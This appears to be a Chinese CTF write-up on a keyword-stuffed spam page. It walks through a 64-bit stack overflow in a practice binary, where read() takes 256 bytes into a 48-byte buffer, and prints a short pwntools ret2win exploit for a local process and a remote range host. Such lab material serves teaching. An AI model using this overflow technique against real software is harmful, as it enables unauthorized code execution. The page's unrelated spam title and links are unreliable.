当前位置: 首页 > wzjs >正文

网站 方案网络推广与网络营销的区别

网站 方案,网络推广与网络营销的区别,做网站该读啥学校,廊坊seo关键字排名用file分析是64位的程序 检查保护发现都是关闭的 用IDA分析,可以看到read()函数就是问题点 IDA分析时常出现的问题点: gets(buf)、strcpy(dest,sec)、scanf("%s",buf)、stract(buf,buf2)、read(0,buf,size…

用file分析是64位的程序

检查保护发现都是关闭的

用IDA分析,可以看到read()函数就是问题点

IDA分析时常出现的问题点:

gets(buf)、strcpy(dest,sec)、scanf("%s",buf)、stract(buf,buf2)、read(0,buf,size)

可以看到申请了一个48字节长度的遍历s

但是read却读取了0x100(256)字节,明显的栈溢出

从IDA分析可以看到距离rbp长度是30

也找到了后门函数

因此得到后门地址

0x400751

exp如下


from pwn import *io = process("./pwn2")get_shell_addr = 0x400751payload = b"A"*(0x30+0x8)+p64(get_shell_addr)    # 因为是64位的程序,ebp长度为8,同时后门地址要用p64转换io.sendline(payload)
io.interactive()

那么打靶场的地址获取flag

from pwn import *io = remote("117.72.52.127","11758")get_shell_addr = 0x400751payload = b"A"*(0x30+0x8)+p64(get_shell_addr)io.sendline(payload)
io.interactive()

http://www.dtcms.com/wzjs/459595.html

相关文章:

  • 昆明市做网站市场调研的方法有哪些
  • jsp简述网站开发流程网文网站排名
  • 网站建设与设计意义广州网络营销公司
  • 网站建设费用报告网站的推广方法有哪些
  • wordpress评论通知代码6上海seo优化外包公司
  • 怎么在自己做的网站上发视频百度在西安的公司叫什么
  • 学校培训网站开发广告策划
  • 网站后台首页设计宁德市蕉城区
  • 域名停靠网页推广大全2021网站快速优化排名软件
  • wordpress软件下载源码页面优化的方法
  • phpcms 网站模板网络运营是什么意思
  • 网站服务器怎么配置it培训班真的有用吗
  • 科技公司手机网站互联网广告投放代理公司
  • 移动端高端网站什么网站可以免费发广告
  • 哪些做网站的公司衡阳seo
  • 仙桃做网站的个人sem是什么意思的缩写
  • 邮件网站怎么做深圳市网络品牌推广
  • 替代wordpress 搜索引擎中山网站seo优化
  • wordpress 新闻采集站优化网站排名软件
  • 广州从化网站建设网站免费发布与推广
  • 中铁建设集团门户网登录入口官网青岛seo结算
  • 网页设计师使用的是什么的屏幕显示颜色模式网站seo外链
  • mindmanager网站建设流程图全球搜索引擎网站
  • 网站开发语言查询 蔡学镛网络营销工作内容是什么
  • 万方网官网入口贴吧aso优化贴吧
  • 对电子商务网站设计的理解新闻头条今日最新消息
  • 深圳网站优化企业企业网站模板免费下载
  • 那种广告式网站怎么做网络营销做得比较成功的企业
  • 钱包网站建设策划百度一下你就知道手机版
  • 电子商务 网站建设qq群推广